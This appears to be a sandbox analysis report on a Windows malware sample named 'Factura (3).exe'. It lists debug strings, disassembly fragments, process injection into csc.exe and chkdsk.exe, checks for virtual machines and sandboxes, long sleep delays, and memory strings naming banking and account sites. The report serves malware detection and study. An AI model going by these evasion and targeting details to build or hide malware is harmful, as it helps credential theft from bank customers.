            Source: Binary string: wntdll.pdbUGP source: csc.exe, 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 0000000E.00000003.1424584842.0000000005012000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000E.00000002.1567920536.000000000550E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000003.1567081999.000000000505D000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000003.1569342109.0000000005202000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Management.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Data.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Configuration.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\System.Core.pdbpdb< source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Data.pdbH source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29EE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1606616466.000001CE29F04000.00000004.00000020.00020000.00000000.sdmp, WERFCB2.tmp.dmp.17.dr
            Source: Binary string: mscorlib.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Numerics.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: omation.pdbVX source: powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbp^ source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.Automation.pdb! source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: XC:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: assembly\GAC_MSC:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbPE source: powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Security.pdb` source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.PowerShell.Commands.Management.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.pdbh source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Core.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbD;. source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000009.00000002.1604691590.000001CE29C57000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb0 source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000002.3762440528.000000000097E000.00000002.00000001.01000000.00000009.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000000.1640062378.000000000097E000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: System.Configuration.Install.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb0OJ source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.Automation.pdbmation.pdbpdbion.pdbment.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Security.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Xml.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.VisualBasic.pdb8 source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1604691590.000001CE29CE3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb@ source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Data.ni.pdbRSDSC source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Xml.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29EE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1606616466.000001CE29F04000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbrogram x source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.Automation.pdb3 source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29EE0000.00000004.00000020.00020000.00000000.sdmp, WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Transactions.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Core.pdbiy source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Transactions.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Transactions.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: Factura (3).exe  Static PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 9_2_00007FF887DB00BD pushad ; iretd  9_2_00007FF887DB00C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_00414074 push eax; retf  14_2_00414173
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_00412002 push esp; retf  14_2_00412043
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_00414138 push eax; retf  14_2_00414173
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_004039F0 push eax; ret  14_2_004039F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_004239A3 push edi; ret  14_2_004239AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_004052EB push es; ret  14_2_004052F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_00425B23 push edi; ret  14_2_00425B2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_00405664 push esp; retf  14_2_0040567A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_00411788 push esp; ret  14_2_00411789
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_00411FB3 push esp; retf  14_2_00412043
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  Code function: 14_2_053A09AD push ecx; mov dword ptr [esp], ecx  14_2_053A09B6
Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 23_2_053E09AD push ecx; mov dword ptr [esp], ecx  23_2_053E09B6
Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 23_2_00772130 push edi; ret  23_2_0077213B
Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 23_2_00772127 push edi; ret  23_2_0077213B
Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 23_2_0075E5C0 push esp; retf  23_2_0075E650
Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 23_2_0075E600 push esp; retf  23_2_0075E650
Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 23_2_007518F8 push es; ret  23_2_007518FD
Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 23_2_0076A90C push 69F0026Ch; retf  23_2_0076A91B
Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 23_2_0076AA4D pushad ; retf  23_2_0076AA6A
Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 23_2_00770B9C push cs; iretd  23_2_00770BD0
Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 23_2_00751C71 push esp; retf  23_2_00751C87
Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 23_2_0076FDC3 push ss; iretd  23_2_0076FDD4
Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 23_2_0075DD95 push esp; ret  23_2_0075DD96
Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 23_2_00771FD2 pushad ; iretd  23_2_00772046
Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 23_2_0076FFB0 push edi; ret  23_2_0076FFB8
Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 23_2_0076FFA7 push edi; ret  23_2_0076FFB8
Source: C:\Windows\SysWOW64\chkdsk.exe  Code function: 23_2_00771FAD pushad ; iretd  23_2_00772046

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7492, type: MEMORYSTR
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12112000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLLP
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAMEP
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened / queried: C:\WINDOWS\system32\drivers\vmmouse.sys
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened / queried: C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened / queried: C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 14_2_0541D1C0 rdtsc 14_2_0541D1C0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (3 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4286
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5431
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4241
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1202
            Source: C:\Windows\SysWOW64\chkdsk.exe | Window / User API: threadDelayed 9839
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | API coverage: 0.8 %
            Source: C:\Windows\SysWOW64\chkdsk.exe | API coverage: 3.1 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696 | Thread sleep time: -12912720851596678s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864 | Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\chkdsk.exe TID: 420 | Thread sleep count: 132 > 30
            Source: C:\Windows\SysWOW64\chkdsk.exe TID: 420 | Thread sleep time: -264000s >= -30000s
            Source: C:\Windows\SysWOW64\chkdsk.exe TID: 420 | Thread sleep count: 9839 > 30
            Source: C:\Windows\SysWOW64\chkdsk.exe TID: 420 | Thread sleep time: -19678000s >= -30000s
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe TID: 356 | Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe TID: 356 | Thread sleep time: -40500s >= -30000s
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe TID: 356 | Thread sleep time: -45000s >= -30000s
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (2 identical entries)
            Source: C:\Windows\SysWOW64\chkdsk.exe | Last function: Thread delayed (2 identical entries)
            Source: C:\Users\user\Desktop\Factura (3).exe | Code function: 6_2_00007FF7340FFC58 FindFirstFileExW, 6_2_00007FF7340FFC58
            Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 23_2_0076B5C0 FindFirstFileW,FindNextFileW,FindClose, 23_2_0076B5C0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (3 identical entries)
            Source: Amcache.hve.17.dr | Binary or memory string: VMware
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: QEMUP
            Source: 2E85-1J297.23.dr | Binary or memory string: global block list test formVMware20,11696497155
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: "SOFTWARE\VMware, Inc.\VMware ToolsP
            Source: 2E85-1J297.23.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: Amcache.hve.17.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: Amcache.hve.17.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: 2E85-1J297.23.dr | Binary or memory string: bankofamerica.comVMware20,11696497155x
            Source: 2E85-1J297.23.dr | Binary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: 2E85-1J297.23.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
            Source: 2E85-1J297.23.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
            Source: Amcache.hve.17.dr | Binary or memory string: vmci.sys
            Source: 2E85-1J297.23.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
            Source: 2E85-1J297.23.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: Amcache.hve.17.dr | Binary or memory string: VMware20,1
            Source: 2E85-1J297.23.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: &C:\WINDOWS\system32\drivers\vmhgfs.sysP
            Source: Amcache.hve.17.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.17.dr | Binary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.17.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
            Source: 2E85-1J297.23.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
            Source: 2E85-1J297.23.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
            Source: Amcache.hve.17.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.17.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.17.dr | Binary or memory string: VMware PCI VMCI Bus Device
            Source: 2E85-1J297.23.dr | Binary or memory string: discord.comVMware20,11696497155f
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: Amcache.hve.17.dr | Binary or memory string: VMware VMCI Bus Device
            Source: 2E85-1J297.23.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
            Source: Amcache.hve.17.dr | Binary or memory string: VMware Virtual RAM
